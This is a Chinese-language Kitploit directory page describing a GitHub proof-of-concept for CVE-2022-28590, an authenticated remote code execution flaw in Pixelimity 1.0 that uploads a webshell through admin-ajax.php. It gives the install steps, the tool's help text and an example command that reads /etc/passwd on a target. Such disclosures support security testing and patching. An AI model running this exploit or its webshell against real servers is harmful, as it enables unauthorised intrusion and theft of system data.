Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-28590 — CVE-2022-28590的验证性利用代码,针对Pixelimity 1.0中的远程代码执行漏洞。通过admin-ajax.php上传webshell以实现经过身份验证的命令执行。 | Kitploit
工具/GitHubGitHub/jcarabantes/cve-2022-28590
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubjcarabantes/cve-2022-28590

CVE-2022-28590

CVE-2022-28590的验证性利用代码,针对Pixelimity 1.0中的远程代码执行漏洞。通过admin-ajax.php上传webshell以实现经过身份验证的命令执行。

查看仓库
6314年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-28590

原始发现和手动PoC来自 tuando243:

Pixelimity 1.0 中通过 admin/admin-ajax.php?action=install_theme 存在一个远程代码执行(RCE)漏洞。

此PoC上传一个简单的webshell以便进一步远程代码执行。该利用程序要求服务器允许 system() 函数,否则必须事先进行一些侦察以检测除了system之外哪些函数允许执行。

安装

root@kitploit:~
git clone https://github.com/jcarabantes/CVE-2022-28590.git
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt

python CVE-2022-28590.py -h

快速使用

root@kitploit:~

python CVE-2022-28590.py -h

  ___  _  _  ____     ___   ___  ___   ___      ___   ___  ___  ___   ___  
 / __)( \/ )( ___)___(__ \ / _ \(__ \ (__ \ ___(__ \ ( _ )| __)/ _ \ / _ \ 
( (__  \  /  )__)(___)/ _/( (_) )/ _/  / _/(___)/ _/ / _ \|__ \_  /( (_) )
 \___)  \/  (____)   (____)\___/(____)(____)   (____)\___/(___/ (_/  \___/ 

                                     Vulnerability discovered by tuando243
                                                 PoC author: @javicarabantes
usage: CVE-2022-28590.py [-h] [-d] [-q] --url URL --user USER [--password PASSWORD] [-c COMMAND]

optional arguments:
  -h, --help           show this help message and exit
  -d                   Debug output
  -q                   Do not print the banner
  --url URL            url: https://server:8081/
  --user USER          admin user
  --password PASSWORD  admin password
  -c COMMAND           Command to execute. Default: id



python CVE-2022-28590.py --url http://localhost:8082 --user myuser -c "cat /etc/passwd"

示例

下载工具